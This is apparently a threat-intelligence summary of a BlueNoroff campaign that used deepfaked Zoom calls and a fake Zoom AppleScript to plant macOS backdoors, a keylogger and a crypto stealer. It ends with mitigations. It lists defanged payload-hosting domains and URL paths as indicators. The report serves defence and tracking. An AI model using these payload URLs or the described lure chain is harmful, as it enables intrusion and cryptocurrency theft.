Full Report
The North Korea-aligned threat actor known as BlueNoroff has been observed targeting an employee in the Web3 sector with deceptive Zoom calls featuring deepfaked company executives to trick them into installing malware on their Apple macOS devices. Huntress, which revealed details of the cyber intrusion, said the attack targeted an unnamed cryptocurrency foundation employee, who received a
Analysis Summary
# Threat Actor: BlueNoroff
## Attribution & Identity
**Threat Actor Identification:** BlueNoroff, a threat actor aligned with North Korea.
**Associated Groups/Aliases:** Sub-cluster within the Lazarus Group. Known aliases include Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, and TA444. DTEX suggests the original APT38 mission has fractured into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka CageyChameleon, CryptoMimic, DangerousPassword, LeeryTurtle, and Sapphire Sleet).
## Activity Summary
BlueNoroff was observed targeting an employee in the Web3 sector using sophisticated social engineering via Telegram and deepfaked executives during a Zoom meeting. The goal was to trick the victim into installing malware on their Apple macOS devices by creating a pretext of needing to fix an audio issue during the call. This incident, uncovered by Huntress, is consistent with the group's known focus on financial and cryptocurrency targets for monetary gain supporting the DPRK.
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Used Telegram messaging to communicate with the victim and deliver a Calendly link pointing to a fake Zoom domain.
- **Social Engineering:** Employed deepfake technology featuring synthetic personas resembling senior company leadership during a video conference (Zoom meeting).
- **Deceptive Software Installation:** Lured the victim to download a malicious AppleScript (`zoom_sdk_support.scpt`) disguised as a Zoom extension.
- **Malware Staging/Execution:** The AppleScript downloaded a next-stage payload from a remote server and executed a shell script.
- **Anti-Forensics:** Disabled bash history logging and wiped the history of executed commands to avoid detection.
- **System Preparation:** Checked for and installed Rosetta 2 if not present on the macOS machine (targeting newer Apple silicon Macs).
- **Persistence/Command & Control:** Established control via multiple backdoors, including a Nim-based primary backdoor and a Go-based backdoor (`Root Troy V4`) capable of running remote AppleScript payloads and shell commands.
- **Lateral Movement/Payload Dropping:** Used a C++ binary loader (`InjectWithDyld`) for process injection and dropping subsequent implants.
- **Data Theft:** Deployed an information stealer (`CryptoBot`) targeting cryptocurrency-related files, and a keylogger (`XScreen`) for monitoring keystrokes, clipboard, and screen activity.
- **Evolution Echoes:** Tactics share similarities with the evolution of related North Korean campaigns like ClickFake Interview (using fake job ads and running malicious commands to fix access issues).
## Targeting
- **Sectors:** Web3 sector, cryptocurrency foundations, financial institutions, and cryptocurrency businesses.
- **Geography:** Victim mentioned was unnamed, but noted related campaigns (like those employing PylangGhost) have targeted users mainly located in India.
- **Victims:** An unnamed cryptocurrency foundation employee was the direct victim referenced in this specific intrusion.
## Tools & Infrastructure
- **Malware Families Used:**
- **Telegram 2:** Nim-based primary backdoor.
- **Root Troy V4:** Fully-featured Go backdoor.
- **InjectWithDyld:** C++ binary loader.
- **Nim implant:** Secondary implant for asynchronous command/response.
- **XScreen:** Objective-C keylogger.
- **CryptoBot:** Go-based information stealer.
- **NetChk:** Binary designed to generate random numbers.
- **Infrastructure (C2, domains, IPs):**
- `support[.]us05web-zoom[.]biz` (for initial payload download)
- `web071zoom[.\]us/fix/audio-fv/7217417464` (for second payload fetch)
- `web071zoom[.]us/fix/audio-tr/7217417464` (for second payload fetch)
## Implications
BlueNoroff/Lazarus sub-groups remain highly proactive in targeting the cryptocurrency and Web3 space for financial theft supporting the DPRK. The use of sophisticated social engineering, including high-fidelity deepfakes and targeted remote session manipulation, indicates a willingness to invest heavily in tailoring attacks against high-value remote workers. The multi-stage execution chain and deployment of specialized implants (keylogger, crypto stealer) demonstrate a commitment to comprehensive system compromise and financial exfiltration.
## Mitigations
- **Security Awareness Training:** Train employees, especially remote workers in high-risk areas, to identify social engineering attacks originating from remote meeting software lures or external contacts proposing urgent fixes.
- **Software Verification:** Exercise extreme caution when asked to download software extensions or scripts, even within seemingly legitimate corporate communications (like Zoom meetings). Verify the source independently.
- **Endpoint Detection & Response (EDR):** Implement robust EDR solutions capable of detecting multi-stage execution, unusual shell script behavior (like history disabling), and process injection.
- **System Hardening:** Monitor for unknown binary execution, especially in temporary directories (`/tmp`) or hidden configuration files (`.pwd`). Monitor for attempts to install or alter system utilities like Rosetta 2 if not standard procedure.